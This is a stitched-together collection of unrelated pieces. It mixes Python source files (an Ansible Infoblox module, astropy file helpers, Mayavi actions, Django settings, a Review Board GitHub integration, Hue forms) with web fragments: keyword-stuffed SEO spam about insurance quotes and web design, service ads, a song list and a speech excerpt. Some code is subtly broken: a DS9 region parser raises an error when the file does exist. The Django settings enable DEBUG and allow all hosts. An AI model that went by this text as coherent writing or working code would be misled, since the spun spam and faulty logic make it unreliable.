using the Infoblox WAPI interface over REST.
- Updates instances of host record object from Infoblox NIOS servers.
requirements:
- infoblox-client
extends_documentation_fragment: nios
options:
name:
description:
- Specifies the fully qualified hostname to add or remove from
the system. User can also update the hostname as it is possible
to pass a dict containing I(new_name), I(old_name). See examples.
required: true
view:
description:
- Sets the DNS view to associate this host record with. The DNS
view must already be configured on the system
required: true
default: default
aliases:
- dns_view
configure_for_dns:
version_added: "2.7"
description:
- Sets the DNS to particular parent. If user needs to bypass DNS
user can make the value to false.
type: bool
required: false
default: true
aliases:
- dns
ipv4addrs:
description:
- Configures the IPv4 addresses for this host record. This argument
accepts a list of values (see suboptions)
aliases:
- ipv4
suboptions:
ipv4addr:
description:
- Configures the IPv4 address for the host record
required: true
aliases:
- address
configure_for_dhcp:
description:
- Configure the host_record over DHCP instead of DNS, if user
changes it to true, user need to mention MAC address to configure
required: false
aliases:
- dhcp
mac:
description:
- Configures the hardware MAC address for the host record. If user makes
DHCP to true, user need to mention MAC address.
required: false
aliases:
- mac
ipv6addrs:
description:
- Configures the IPv6 addresses for the host record. This argument
accepts a list of values (see options)
aliases:
- ipv6
suboptions:
ipv6addr:
description:
- Configures the IPv6 address for the host record
required: true
aliases:
- address
configure_for_dhcp:
description:
- Configure the host_record over DHCP instead of DNS, if user
changes it to true, user need to mention MAC address to configure
required: false
aliases:
- dhcp
aliases:
version_added: "2.6"
description:
- Configures an optional list of additional aliases to add to the host
record. These are equivalent to CNAMEs but held within a host
record. Must be in list format.
ttl:
description:
- Configures the TTL to be associated with this host record
extattrs:
description:
- Allows for the configuration of Extensible Attributes on the
instance of the object. This argument accepts a set of key / value
pairs for configuration.
comment:
description:
- Configures a text string comment to be associated with the instance
of this object. The provided text string will be configured on the
object instance.
state:
description:
- Configures the intended state of the instance of the object on
the NIOS server. When this value is set to C(present), the object
is configured on the device and when this value is set to C(absent)
the value is removed (if necessary) from the device.
default: present
choices:
- present
- absent
'''
EXAMPLES = '''
- name: configure an ipv4 host record
nios_host_record:
name: host.ansible.com
ipv4:
- address: 192.168.10.1
aliases:
- cname.ansible.com
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: add a comment to an existing host record
nios_host_record:
name: host.ansible.com
ipv4:
- address: 192.168.10.1
comment: this is a test comment
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: remove a host record from the system
nios_host_record:
name: host.ansible.com
state: absent
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: update an ipv4 host record
nios_host_record:
name: {new_name: host-new.ansible.com, old_name: host.ansible.com}
ipv4:
- address: 192.168.10.1
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: create an ipv4 host record bypassing DNS
nios_host_record:
name: new_host
ipv4:
- address: 192.168.10.1
dns: false
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
- name: create an ipv4 host record over DHCP
nios_host_record:
name: host.ansible.com
ipv4:
- address: 192.168.10.1
dhcp: true
mac: 00-80-C8-E3-4C-BD
state: present
provider:
host: "{{ inventory_hostname_short }}"
username: admin
password: admin
connection: local
'''
RETURN = ''' # '''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.six import iteritems
from ansible.module_utils.net_tools.nios.api import WapiModule
from ansible.module_utils.net_tools.nios.api import NIOS_HOST_RECORD
def ipaddr(module, key, filtered_keys=None):
''' Transforms the input value into a struct supported by WAPI
This function will transform the input from the playbook into a struct
that is valid for WAPI in the form of:
{
ipv4addr: <value>,
mac: <value>
}
This function does not validate the values are properly formatted or in
the acceptable range, that is left to WAPI.
'''
filtered_keys = filtered_keys or list()
objects = list()
for item in module.params[key]:
objects.append(dict([(k, v) for k, v in iteritems(item) if v is not None and k not in filtered_keys]))
return objects
def ipv4addrs(module):
return ipaddr(module, 'ipv4addrs', filtered_keys=['address', 'dhcp'])
def ipv6addrs(module):
return ipaddr(module, 'ipv6addrs', filtered_keys=['address', 'dhcp'])
def main():
''' Main entry point for module execution
'''
ipv4addr_spec = dict(
ipv4addr=dict(required=True, aliases=['address'], ib_req=True),
configure_for_dhcp=dict(type='bool', required=False, aliases=['dhcp'], ib_req=True),
mac=dict(required=False, aliases=['mac'], ib_req=True)
)
ipv6addr_spec = dict(
ipv6addr=dict(required=True, aliases=['address'], ib_req=True),
configure_for_dhcp=dict(type='bool', required=False, aliases=['configure_for_dhcp'], ib_req=True),
mac=dict(required=False, aliases=['mac'], ib_req=True)
)
ib_spec = dict(
name=dict(required=True, ib_req=True),
view=dict(default='default', aliases=['dns_view'], ib_req=True),
ipv4addrs=dict(type='list', aliases=['ipv4'], elements='dict', options=ipv4addr_spec, transform=ipv4addrs),
ipv6addrs=dict(type='list', aliases=['ipv6'], elements='dict', options=ipv6addr_spec, transform=ipv6addrs),
configure_for_dns=dict(type='bool', default=True, required=False, aliases=['dns'], ib_req=True),
aliases=dict(type='list'),
ttl=dict(type='int'),
extattrs=dict(type='dict'),
comment=dict(),
)
argument_spec = dict(
provider=dict(required=True),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(ib_spec)
argument_spec.update(WapiModule.provider_spec)
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True)
wapi = WapiModule(module)
result = wapi.run(NIOS_HOST_RECORD, ib_spec)
module.exit_json(**result)
if __name__ == '__main__':
main()
|
Geico New Quote Gorgeous Who Has The Cheapest Motorcycle Insurance Quotes In New York was posted in September 28 2018 at 7:04 am and has been seen by 17 users. Geico New Quote Gorgeous Who Has The Cheapest Motorcycle Insurance Quotes In New York is best picture that can use for individual and noncommercial purpose because All trademarks referenced here in are the properties of their respective owners. If you want to see other picture of Geico New Quote Gorgeous Who Has The Cheapest Motorcycle Insurance Quotes In New York you can browse our other pages and if you want to view image in full size just click image on gallery below.
GEICO Gecko’s new book ‘You’re Only Human’ offers readers a modern New Car Insurance Quotes Florida Comparison Geico Car Insurance Geico New Quote Stunning Welcome To The New Geico Renters Insurance Geico Home Insurance Quote New Geico Quote Line Pleasing Geico Line Geico New Car Insurance Quote Luxury Geico S Mobile App Free Geico Quote Auto Insurance Agreeable Geico New Quote Extraordinary Welcome to the New GEICO Renters Insurance Site New Geico Auto Insurance Free Quote Geico Temporary Auto Insurance 48 Sparkling Geico Insurance Quote Phone Number Pics Inspirational Geico New Quote QUOTES OF THE DAY Geico New Quote.
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""File Input/Output."""
import os
import pickle
import warnings
import numpy as np
from astropy.io import fits
__all__ = ['save_to_pickle', 'save_to_hickle', 'save_to_csv',
'save_to_fits', 'parse_reg_ellipse', 'psfex_extract',
'read_from_pickle', 'save_to_dill', 'read_from_dill']
def read_from_pickle(name, py2=False):
"""Read the data from Pickle file."""
if py2:
return pickle.load(open(name, "rb"), encoding='latin1')
return pickle.load(open(name, "rb"))
def save_to_pickle(obj, name):
"""Save an object to a cPickle/Pickle format binary file."""
output = open(name, 'wb')
pickle.dump(obj, output, protocol=2)
output.close()
return
def save_to_hickle(obj, name):
"""Save an object to a hickle/HDF5 format binary file."""
try:
import hickle
except ImportError:
raise Exception("### The Hickle package is required!")
output = open(name, 'wb')
hickle.dump(obj, output, protocol=2)
output.close()
return
def save_to_csv(array, name):
"""Save a numpy array to a CSV file.
Use the dtype.name as column name if possible
"""
output = open(name, 'w')
colNames = array.dtype.names
output.write("#" + ', '.join(colNames) + '\n')
for item in array:
line = ''
for i in range(0, len(colNames)-1):
col = colNames[i]
line += str(item[col]) + ' , '
line += str(item[colNames[-1]]) + '\n'
output.write(line)
output.close()
return
def save_to_fits(img, fits_file, wcs=None, header=None, overwrite=True):
"""Save an image to FITS file."""
if wcs is not None:
wcs_header = wcs.to_header()
img_hdu = fits.PrimaryHDU(img, header=wcs_header)
else:
img_hdu = fits.PrimaryHDU(img)
if header is not None:
if 'SIMPLE' in header and 'BITPIX' in header:
img_hdu.header = header
else:
img_hdu.header.extend(header)
if os.path.islink(fits_file):
os.unlink(fits_file)
img_hdu.writeto(fits_file, overwrite=overwrite)
return
def parse_reg_ellipse(reg_file):
"""Parse a DS9 .reg files.
convert the Ellipse or Circle regions
into arrays of parameters for ellipse:
x, y, a, b, theta
"""
if os.path.isfile(reg_file):
raise Exception("### Can not find the .reg file!")
# Parse the .reg file into lines
lines = [line.strip() for line in open(reg_file, 'r')]
# Coordinate type of this .reg file: e.g. 'image'
coord_type = lines[2].strip()
# Parse each region
regs = [reg.split(" ") for reg in lines[3:]]
xc = []
yc = []
ra = []
rb = []
theta = []
for reg in regs:
if reg[0].strip() == 'ellipse' and len(reg) == 6:
xc.append(float(reg[1]))
yc.append(float(reg[2]))
ra.append(float(reg[3]))
rb.append(float(reg[4]))
theta.append(float(reg[5]) * np.pi / 180.0)
elif reg[0].strip() == 'circle' and len(reg) == 4:
xc.append(float(reg[1]))
yc.append(float(reg[2]))
ra.append(float(reg[3]))
rb.append(float(reg[3]))
theta.append(0.0)
else:
warnings.warn("Wrong shape, only Ellipse or Circle are availabe")
xc = np.array(xc, dtype=np.float32)
yc = np.array(yc, dtype=np.float32)
ra = np.array(ra, dtype=np.float32)
rb = np.array(rb, dtype=np.float32)
theta = np.array(theta, dtype=np.float32)
return xc, yc, ra, rb, theta, coord_type
def psfex_extract(psfex_file, row, col):
"""Extract PSF image from PSFex result."""
try:
import psfex
except ImportError:
raise Exception("Need to install PSFex library first!")
return psfex.PSFEx(psfex_file).get_rec(row, col)
def save_to_dill(obj, name):
"""Save the Python object in a dill file."""
import dill
with open(name, "wb") as dill_file:
dill.dump(obj, dill_file)
def read_from_dill(name):
"""Read saved Python object from a dill file."""
import dill
with open(name, "rb") as dill_file:
content = dill.load(dill_file)
return content
|
With the coming of the internet, online travel guides have grown to be extremely popular. Much information regarding an area can be obtained about the various websites if properly searched. You can get information around the ways to achieve the place, several types of accommodation facilities that exist there, places law firm web design studio to eat and drink, places of tourist attractions at the travel destination, local transportation, climatic conditions, geographical features, historical references and others things. With all these information available, you are able to know a spot in a very far better way. In fact, you can plan your journey nicely should you lawyer web design studio curently have guidance about the best place. There are no probability of passing up on any important place while about the trip while using right type of travel guide.
During the planning stages, this implies approaching the project mainly as an information solution in lieu of like a design or commercial solution. Naturally, elements of marketing and aesthetics also factor into the process; the manner in which it is integrated is dictated by how well they normalize up against the informative material.
Secondly, avoid using frames in your website development. It might be not that hard to suit your needs if you do however it will be really confusing as a result of multiple scroll bars and when your prospective customers become frustrated chances are they'll may possibly just navigate away in the interest of something easier to use. A simple design that displays information and content within an accessible, user-friendly way will attract probably the most attention and encourage further visits in the foreseeable future.
I wanted to look at my daughter to view a couple of movies in the summer, unfortunately most are only being shown in 3D (although some people might may be shown in normal screens afterwards). Neither of us like 3D and, even as both wear glasses, find wearing the 3D ones over our prescription glasses very annoying.
Having knowledge of basic codes and tags of HTML is essential for a web development company, however it is also essential for every single web design service which he comes with a in-depth expertise in PHP coding, valid HTML language and MySOL databases. Sleek, clean and modern websites are designed while using the XHTML language and creating MySOL databases. Here are listed many of the basic web site design tutorial tips that will help you increase your web design.
|
"""Actions to start various modules.
"""
# Author: Prabhu Ramachandran <[email protected]>
# Copyright (c) 2005-2008, Enthought, Inc.
# License: BSD Style.
import new
# Local imports.
from mayavi.core.registry import registry
from mayavi.core.metadata import ModuleMetadata
from mayavi.core.pipeline_info import PipelineInfo
from mayavi.action.filters import FilterAction
######################################################################
# `ModuleAction` class.
######################################################################
class ModuleAction(FilterAction):
###########################################################################
# 'Action' interface.
###########################################################################
def perform(self, event):
""" Performs the action. """
callable = self.metadata.get_callable()
obj = callable()
mv = self.mayavi
mv.add_module(obj)
mv.engine.current_selection = obj
######################################################################
# `AddModuleManager` class.
######################################################################
class AddModuleManager(ModuleAction):
""" An action that adds a ModuleManager to the tree. """
tooltip = "Add a ModuleManager to the current source/filter"
description = "Add a ModuleManager to the current source/filter"
metadata = ModuleMetadata(id="AddModuleManager",
class_name="mayavi.core.module_manager.ModuleManager",
menu_name="&Add ModuleManager",
tooltip="Add a ModuleManager to the current source/filter",
description="Add a ModuleManager to the current source/filter",
input_info = PipelineInfo(datasets=['any'],
attribute_types=['any'],
attributes=['any'])
)
def perform(self, event):
""" Performs the action. """
from mayavi.core.module_manager import ModuleManager
mm = ModuleManager()
mv = self.mayavi
mv.add_module(mm)
mv.engine.current_selection = mm
######################################################################
# Creating the module actions automatically.
for module in registry.modules:
d = {'tooltip': module.tooltip,
'description': module.desc,
'metadata': module}
action = new.classobj(module.id, (ModuleAction,), d)
globals()[module.id] = action
|
Electrolysis is the only FDA approved treatment for permanent hair removal, aimed to eliminate unwanted hairs from the face and body and prevent future growth.
Our expert technicians use a very fine probe to apply a small amount of electricity to individual hair follicles. Once the current is applied, hair growth cells are destroyed to eradicate future recurrence.
Electrolysis can be performed on any skin or hair colors. Hence, Electrolysis is the only effective method known to permanently remove Gray, light blonde or red hair.
Many factors influence hair growth, so you will need to return for several electrolysis visits. The total number of sessions needed to remove hair permanently from a particular area will vary from person to person. Most patients return once a week or every other week as needed. But the unwanted hair will be gone forever once the series of treatments is complete. Each treatment lasts between 15 minutes to one hour.
Electrolysis permanently destroys the growth cells of the hair follicle, preventing treated hairs from growing back. Treatment can be applied to most facial and body parts including eyebrows, chin, upper and lower lip, jaw line, sides of the face, breasts, underarms, abdomen, bikini line, fingers and toes, legs and back.
Are all hairs eliminated with one Electrolysis treatment or is regrowth to be expected?
During consultation, our Electrologist will design a treatment plan that addresses your specific hair removal needs.
|
#!/usr/bin/env python2
#-*- coding: UTF-8 -*-
#File:
#Date:
#Author: Yang Liu <[email protected]>
#Description:
if __name__=="__main__":
with open("test.log","w") as logout, open("result.out") as f, open("result.out.out","w") as fout, open("log.txt") as log:
#log loading
content2id = {}
id2word = {}
for l in log:
word, word_number, topic_number, content_id, _ = l.strip().split()
word_number = int(word_number)
topic_number = int(topic_number)
content_id = int(content_id)
content2id[(word_number, topic_number)] = content_id
id2word[word_number] = word
print "LOADING COMPLETED"
for (line_num, l) in enumerate(f):
word1, topic1, word2, topic2, score = l.strip().split()
word1 = int(word1)
topic1 = int(topic1)
word2 = int(word2)
topic2 = int(topic2)
try:
content1 = content2id[(word1, topic1)]
content2 = content2id[(word2, topic2)]
except:
print line_num
continue
print >> fout, content1, content2, score
print >>logout, id2word[word1], id2word[word2]
|
HIGHLIGHTS - Something for everyone!
Stay to salsa, cumbia and tango until late with The New Monos and more.
Don’t miss this free unique cultural event for the entire family!
|
#!/usr/bin/env python
"""Distribution Utilities for crypto-cookie package
"""
__author__ = "@philipkershaw"
__date__ = "09/07/15"
__copyright__ = "(C) 2015 Science and Technology Facilities Council"
__license__ = "BSD - see LICENSE file in top-level directory"
__contact__ = "[email protected]"
__revision__ = '$Id$'
from setuptools import setup, find_packages
import os
THIS_DIR = os.path.dirname(__file__)
DESCRIPTION = 'Package to encrypt and sign cookies'
try:
LONG_DESCR = open(os.path.join(THIS_DIR, 'README.md')).read()
except IOError:
LONG_DESCR = ""
setup(
name = 'crypto-cookie',
version = '0.2.0',
description = DESCRIPTION,
long_description = LONG_DESCR,
author = 'Philip Kershaw',
author_email = '[email protected]',
maintainer = 'Philip Kershaw',
maintainer_email = '[email protected]',
url = 'https://github.com/cedadev/crypto-cookie',
license = 'BSD - See LICENCE file for details',
install_requires = ["cryptography"],
extras_require = {'SecureCookie': ['Paste']},
# dependency_links = ["http://dist.ceda.ac.uk/pip/"],
packages = find_packages(),
entry_points = None,
test_suite = 'crypto_cookie.test',
zip_safe = False
)
|
Finding a security guard in Alfred is fast, easy and secure with MeetASecurityGuard!
Are you in need of a reputable, seasoned security guard in Alfred? Are you finding it difficult to find an experienced security guard for your company or private home? Whether you need personal, residential, corporate or armed security guards MeetASecurityGuard.com is the answer, connecting you instantly with dozens of security guards in the Alfred area in one convenient place. Nervous about using our system? No problem. Our customer team is on hand and available to answer any questions related to the hiring process, contacting potential hires through their profiles and more. We’re here to help!
With the extensive database on MeetASecurityGuard.com, you’ll be able to view the profiles of dozens of reputable security guards looking for work in the Alfred area. You’re able to connect directly with them on our site – safely and securely. No need to share any personal information!
Browse our Alfred security guards below– take advantage of our comprehensive database of local Alfred security guards. You can view full profiles which include experience, references, availability and more prior to deciding to contact potential candidates.
Get started today and find the perfect Alfred guard for your business.
|
import os
import dj_database_url
from jt_portfolio.settings.base import *
DEBUG = True
DATABASES = {
'default': {
'ENGINE': dj_database_url.config(
default=os.environ.get('DATABASE_URL')
)
}
}
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = os.environ['EMAIL_USER']
EMAIL_HOST_PASSWORD = os.environ['EMAIL_PW']
EMAIL_PORT = 587
DEFAULT_FROM_EMAIL = os.environ['EMAIL_DEFAULT']
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
ACCOUNT_ACTIVATION_DAYS = 3
# Update database configuration with $DATABASE_URL.
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Allow all host headers
ALLOWED_HOSTS = ['*']
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)s [%(asctime)s] %(module)s %(message)s'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
},
'file': {
'class': 'logging.handlers.RotatingFileHandler',
'formatter': 'verbose',
'filename': './logs/jtp.log',
'maxBytes': 1024000,
'backupCount': 3,
},
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['file', 'console', 'mail_admins'],
'propagate': True,
'level': 'DEBUG',
},
}
}
|
Items tagged with "Lee & Walker, 922 Chestnut St."
Birds in the Night. A Lullaby.
Medley March. Introducing the popular airs The Mocking Bird, How Can I Leave Thee, Captain Jinks, and Not For Joe.
When Thou Art Far Away, My Love.
That Little Church Around the Corner.
The Only Authorized Edition. The Little Wee Dog.
Good Bye Liza Jane. Comic Song.
Don't Forget to Write Me Darling.
Always on the Stare. Song and Chorus.
'Twere Better That Words Were Unspoken. New Ballad.
Meet Me With a Kiss. A Beautiful Song and Chorus.
|
import httplib
import logging
import urllib2
from django import forms
from django.conf import settings
from django.contrib.sites.models import Site
from django.utils import simplejson
from django.utils.translation import ugettext_lazy as _
from djblets.siteconfig.models import SiteConfiguration
from reviewboard.hostingsvcs.errors import AuthorizationError, \
SSHKeyAssociationError
from reviewboard.hostingsvcs.forms import HostingServiceForm
from reviewboard.hostingsvcs.service import HostingService
from reviewboard.scmtools.errors import FileNotFoundError
from reviewboard.site.urlresolvers import local_site_reverse
class GitHubPublicForm(HostingServiceForm):
github_public_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<username>/<repo_name>/'))
class GitHubPrivateForm(HostingServiceForm):
github_private_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<username>/<repo_name>/'))
class GitHubPublicOrgForm(HostingServiceForm):
github_public_org_name = forms.CharField(
label=_('Organization name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the organization. This is the '
'<org_name> in '
'http://github.com/<org_name>/<repo_name>/'))
github_public_org_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<org_name>/<repo_name>/'))
class GitHubPrivateOrgForm(HostingServiceForm):
github_private_org_name = forms.CharField(
label=_('Organization name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the organization. This is the '
'<org_name> in '
'http://github.com/<org_name>/<repo_name>/'))
github_private_org_repo_name = forms.CharField(
label=_('Repository name'),
max_length=64,
required=True,
widget=forms.TextInput(attrs={'size': '60'}),
help_text=_('The name of the repository. This is the '
'<repo_name> in '
'http://github.com/<org_name>/<repo_name>/'))
class GitHub(HostingService):
name = _('GitHub')
plans = [
('public', {
'name': _('Public'),
'form': GitHubPublicForm,
'repository_fields': {
'Git': {
'path': 'git://github.com/%(hosting_account_username)s/'
'%(github_public_repo_name)s.git',
'mirror_path': '[email protected]:'
'%(hosting_account_username)s/'
'%(github_public_repo_name)s.git',
}
},
'bug_tracker_field': 'http://github.com/'
'%(hosting_account_username)s/'
'%(github_public_repo_name)s/issues#issue/%%s',
}),
('public-org', {
'name': _('Public Organization'),
'form': GitHubPublicOrgForm,
'repository_fields': {
'Git': {
'path': 'git://github.com/%(github_public_org_name)s/'
'%(github_public_org_repo_name)s.git',
'mirror_path': '[email protected]:%(github_public_org_name)s/'
'%(github_public_org_repo_name)s.git',
}
},
'bug_tracker_field': 'http://github.com/'
'%(github_public_org_name)s/'
'%(github_public_org_repo_name)s/'
'issues#issue/%%s',
}),
('private', {
'name': _('Private'),
'form': GitHubPrivateForm,
'repository_fields': {
'Git': {
'path': '[email protected]:%(hosting_account_username)s/'
'%(github_private_repo_name)s.git',
'mirror_path': '',
},
},
'bug_tracker_field': 'http://github.com/'
'%(hosting_account_username)s/'
'%(github_private_repo_name)s/'
'issues#issue/%%s',
}),
('private-org', {
'name': _('Private Organization'),
'form': GitHubPrivateOrgForm,
'repository_fields': {
'Git': {
'path': '[email protected]:%(github_private_org_name)s/'
'%(github_private_org_repo_name)s.git',
'mirror_path': '',
},
},
'bug_tracker_field': 'http://github.com/'
'%(github_private_org_name)s/'
'%(github_private_org_repo_name)s/'
'issues#issue/%%s',
}),
]
needs_authorization = True
supports_repositories = True
supports_bug_trackers = True
supports_ssh_key_association = True
supported_scmtools = ['Git']
API_URL = 'https://api.github.com/'
RAW_MIMETYPE = 'application/vnd.github.v3.raw'
def authorize(self, username, password, local_site_name=None,
*args, **kwargs):
site = Site.objects.get_current()
siteconfig = SiteConfiguration.objects.get_current()
site_url = '%s://%s%s' % (
siteconfig.get('site_domain_method'),
site.domain,
local_site_reverse('root', local_site_name=local_site_name))
try:
body = {
'scopes': [
'user',
'repo',
],
'note': 'Access for Review Board',
'note_url': site_url,
}
# If the site is using a registered GitHub application,
# send it in the requests. This will gain the benefits of
# a GitHub application, such as higher rate limits.
if (hasattr(settings, 'GITHUB_CLIENT_ID') and
hasattr(settings, 'GITHUB_CLIENT_SECRET')):
body.update({
'client_id': settings.GITHUB_CLIENT_ID,
'client_secret': settings.GITHUB_CLIENT_SECRET,
})
rsp, headers = self._json_post(
url=self.API_URL + 'authorizations',
username=username,
password=password,
body=simplejson.dumps(body))
except (urllib2.HTTPError, urllib2.URLError), e:
data = e.read()
try:
rsp = simplejson.loads(data)
except:
rsp = None
if rsp and 'message' in rsp:
raise AuthorizationError(rsp['message'])
else:
raise AuthorizationError(str(e))
self.account.data['authorization'] = rsp
self.account.save()
def is_authorized(self):
return ('authorization' in self.account.data and
'token' in self.account.data['authorization'])
def get_file(self, repository, path, revision, *args, **kwargs):
url = self._build_api_url(repository, 'git/blobs/%s' % revision)
try:
return self._http_get(url, headers={
'Accept': self.RAW_MIMETYPE,
})[0]
except (urllib2.URLError, urllib2.HTTPError):
raise FileNotFoundError(path, revision)
def get_file_exists(self, repository, path, revision, *args, **kwargs):
url = self._build_api_url(repository, 'git/blobs/%s' % revision)
try:
self._http_get(url, headers={
'Accept': self.RAW_MIMETYPE,
})
return True
except (urllib2.URLError, urllib2.HTTPError):
return False
def is_ssh_key_associated(self, repository, key):
if not key:
return False
formatted_key = self._format_public_key(key)
# The key might be a deploy key (associated with a repository) or a
# user key (associated with the currently authorized user account),
# so check both.
deploy_keys_url = self._build_api_url(repository, 'keys')
user_keys_url = ('%suser/keys?access_token=%s'
% (self.API_URL,
self.account.data['authorization']['token']))
for url in (deploy_keys_url, user_keys_url):
keys_resp = self._key_association_api_call(self._json_get, url)
keys = [
item['key']
for item in keys_resp
if 'key' in item
]
if formatted_key in keys:
return True
return False
def associate_ssh_key(self, repository, key, *args, **kwargs):
url = self._build_api_url(repository, 'keys')
if key:
post_data = {
'key': self._format_public_key(key),
'title': 'Review Board (%s)' %
Site.objects.get_current().domain,
}
self._key_association_api_call(self._http_post, url,
content_type='application/json',
body=simplejson.dumps(post_data))
def _key_association_api_call(self, instance_method, *args,
**kwargs):
"""Returns response of API call, or raises SSHKeyAssociationError.
The `instance_method` should be one of the HostingService http methods
(e.g. _http_post, _http_get, etc.)
"""
try:
response, headers = instance_method(*args, **kwargs)
return response
except (urllib2.HTTPError, urllib2.URLError), e:
try:
rsp = simplejson.loads(e.read())
status_code = e.code
except:
rsp = None
status_code = None
if rsp and status_code:
api_msg = self._get_api_error_message(rsp, status_code)
raise SSHKeyAssociationError('%s (%s)' % (api_msg, e))
else:
raise SSHKeyAssociationError(str(e))
def _format_public_key(self, key):
"""Return the server's SSH public key as a string (if it exists)
The key is formatted for POSTing to GitHub's API.
"""
# Key must be prepended with algorithm name
return '%s %s' % (key.get_name(), key.get_base64())
def _get_api_error_message(self, rsp, status_code):
"""Return the error(s) reported by the GitHub API, as a string
See: http://developer.github.com/v3/#client-errors
"""
if 'message' not in rsp:
msg = _('Unknown GitHub API Error')
elif 'errors' in rsp and status_code == httplib.UNPROCESSABLE_ENTITY:
errors = [e['message'] for e in rsp['errors'] if 'message' in e]
msg = '%s: (%s)' % (rsp['message'], ', '.join(errors))
else:
msg = rsp['message']
return msg
def _http_get(self, url, *args, **kwargs):
data, headers = super(GitHub, self)._http_get(url, *args, **kwargs)
self._check_rate_limits(headers)
return data, headers
def _http_post(self, url, *args, **kwargs):
data, headers = super(GitHub, self)._http_post(url, *args, **kwargs)
self._check_rate_limits(headers)
return data, headers
def _check_rate_limits(self, headers):
rate_limit_remaining = headers.get('X-RateLimit-Remaining', None)
try:
if (rate_limit_remaining is not None and
int(rate_limit_remaining) <= 100):
logging.warning('GitHub rate limit for %s is down to %s',
self.account.username, rate_limit_remaining)
except ValueError:
pass
def _build_api_url(self, repository, api_path):
return '%s%s?access_token=%s' % (
self._get_repo_api_url(repository),
api_path,
self.account.data['authorization']['token'])
def _get_repo_api_url(self, repository):
plan = repository.extra_data['repository_plan']
if plan == 'public':
repo_name = repository.extra_data['github_public_repo_name']
owner = self.account.username
elif plan == 'private':
repo_name = repository.extra_data['github_private_repo_name']
owner = self.account.username
elif plan == 'public-org':
repo_name = repository.extra_data['github_public_org_repo_name']
owner = repository.extra_data['github_public_org_name']
elif plan == 'private-org':
repo_name = repository.extra_data['github_private_org_repo_name']
owner = repository.extra_data['github_private_org_name']
return '%srepos/%s/%s/' % (self.API_URL, owner, repo_name)
|
Essential to the attainment of these national goals is the moral imperative of ensuring social justice and respect for human dignity. The great biblical tradition enjoins on all peoples the duty to hear the voice of the poor. It bids us break the bonds of injustice and oppression which give rise to glaring, and indeed scandalous, social inequalities. Reforming the social structures which perpetuate poverty and the exclusion of the poor first requires a conversion of mind and heart. The Bishops of the Philippines have asked that this year be set aside as the “Year of the Poor”. I hope that this prophetic summons will challenge everyone, at all levels of society, to reject every form of corruption which diverts resources from the poor. May it also inspire concerted efforts to ensure the inclusion of every man and woman and child in the life of the community.
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import urllib
from django import forms
from django.contrib.auth.models import User, Group
from django.forms import FileField, CharField, BooleanField, Textarea
from django.forms.formsets import formset_factory, BaseFormSet, ManagementForm
from desktop.lib import i18n
from filebrowser.lib import rwx
from hadoop.fs import normpath
from django.utils.translation import ugettext_lazy as _
logger = logging.getLogger(__name__)
class FormSet(BaseFormSet):
def __init__(self, data=None, prefix=None, *args, **kwargs):
self.prefix = prefix or self.get_default_prefix()
if data:
self.data = {}
# Add management field info
# This is hard coded given that none of these keys or info is exportable
# This could be a problem point if the management form changes in later releases
self.data['%s-TOTAL_FORMS' % self.prefix] = len(data)
self.data['%s-INITIAL_FORMS' % self.prefix] = len(data)
self.data['%s-MAX_NUM_FORMS' % self.prefix] = 0
# Add correct data
for i in range(0, len(data)):
prefix = self.add_prefix(i)
for field in data[i]:
self.data['%s-%s' % (prefix, field)] = data[i][field]
BaseFormSet.__init__(self, self.data, self.prefix, *args, **kwargs)
class PathField(CharField):
def __init__(self, label, help_text=None, **kwargs):
kwargs.setdefault('required', True)
kwargs.setdefault('min_length', 1)
forms.CharField.__init__(self, label=label, help_text=help_text, **kwargs)
def clean(self, value):
return normpath(CharField.clean(self, value))
class EditorForm(forms.Form):
path = PathField(label=_("File to edit"))
contents = CharField(widget=Textarea, label=_("Contents"), required=False)
encoding = CharField(label=_('Encoding'), required=False)
def clean_path(self):
return urllib.unquote(self.cleaned_data.get('path', ''))
def clean_contents(self):
return self.cleaned_data.get('contents', '').replace('\r\n', '\n')
def clean_encoding(self):
encoding = self.cleaned_data.get('encoding', '').strip()
if not encoding:
return i18n.get_site_encoding()
return encoding
